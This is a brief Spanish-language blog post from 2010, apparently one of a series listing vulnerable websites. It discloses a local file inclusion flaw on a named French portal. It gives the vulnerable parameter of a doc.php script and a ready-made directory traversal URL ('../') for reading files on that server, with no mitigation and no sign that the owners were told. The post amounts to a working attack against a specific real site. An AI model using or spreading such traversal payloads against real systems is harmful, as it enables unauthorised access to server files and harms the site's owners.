LFI | www.fhpr2a.fr/portail
Posteado: jueves, 19 de agosto de 2010 by Franco Di En Secciones: bugsnivelweb, HRiskTs, L.F.I
0
Vulnerabilidad de tipo L.F.I encontrada en www.fhpr2a.fr/
Esta vulnerabilidad de encuentra en la parte doc.php que nos permite ver archivos alojados en el mismo servidor, variable vulnerable:
http://www.fhpr2a.fr/portail/doc.php?file=
Ej: http://www.fhpr2a.fr/portail/doc.php?file=../habillage/global.css.php
Saludos
Dr [F]